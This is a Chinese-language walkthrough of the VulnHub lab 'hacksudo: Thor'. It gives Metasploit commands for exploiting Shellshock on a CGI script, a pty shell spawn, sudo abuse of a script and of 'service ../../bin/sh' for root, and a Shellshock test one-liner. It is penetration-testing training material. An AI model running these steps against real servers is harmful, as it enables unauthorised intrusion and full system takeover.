vulnhub靶場之HACKSUDO: THOR
準備:
攻擊機:虛擬機kali、本機win10。
靶機:hacksudo: Thor,下載地址://download.vulnhub.com/hacksudo/hacksudo—Thor.zip,下載後直接vbox打開即可。
知識點:service提權、Shellshock漏洞利用。
資訊收集:
掃描下埠對應的服務:nmap -T4 -sV -p- -A 192.168.110.6,顯示開放了22、80埠,開啟了ssh、http服務。
目錄掃描:
使用dirmap進行目錄掃描,發現admin_login.php、home.php、README.md、news.php等文件。
訪問README.md文件,發現關於賬戶的資訊:admin/password123。
使用獲得賬戶名和密碼資訊:admin/password123進行登錄,在//192.168.110.6/home.php登錄失敗,但是在//192.168.110.6/admin_login.php介面成功登錄。
Shellshock-破殼漏洞:
然後在admin賬戶中創建了新的賬戶,在//192.168.110.6/home.php進行登錄,但是在兩個登陸後的介面中均未發現可以獲取shell的功能。然後在news.php中發現了cgi-bin,猜測這裡存在破殼漏洞。
使用dirsearch對//192.168.110.6/cgi-bin/進行掃描,發現shell.sh文件,但是訪問該文件無法訪問。
使用msf進行驗證是否存在破殼漏洞,依次執行如下命令,經過驗證發現存在shellshock漏洞。
search Shellshock
use 2
show options
set rhost 192.168.110.6
set TARGETURI /cgi-bin/shell.sh
run
獲取shell:
使用msf依次執行以下命令,成功獲得shell許可權。
search Shellshock
use 1
show options
set rhost 192.168.110.6
set TARGETURI /cgi-bin/shell.sh
run
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
提權至thor:
查看下當前賬戶是否存在可以使用的特權命令或文件:sudo -l,發現/home/thor/./hammer.sh文件。
使用thor的用戶許可權執行腳本該腳本,發現會讓我們輸入一個key(疑是我們的身份)一個secret(會被執行),在輸入bash時形成了一個新的shell窗口,許可權是thor。
獲得thor許可權後,在/home/thor目錄下發現user.txt文件並讀取該文件資訊,成功獲得flag值。
提權至root:
查看下當前賬戶是否存在可以使用的特權命令或文件:sudo -l,發現cat和service命令。
查找下service命令的提權方式,得到其提權命令:sudo service ../../bin/sh,成功提權到root許可權並在/root目錄下發現root.txt文件並讀取到flag值。
補充:
如果我們可以正常使用目標伺服器時,也可以通過以下命令:env x=‘() { :;}; echo vulnerable’ bash -c “echo this is a test “,來進行測試是否存在Shellshock漏洞,下面是存在此漏洞和不存在此漏洞的對比圖,左側無此漏洞,右側存在此漏洞。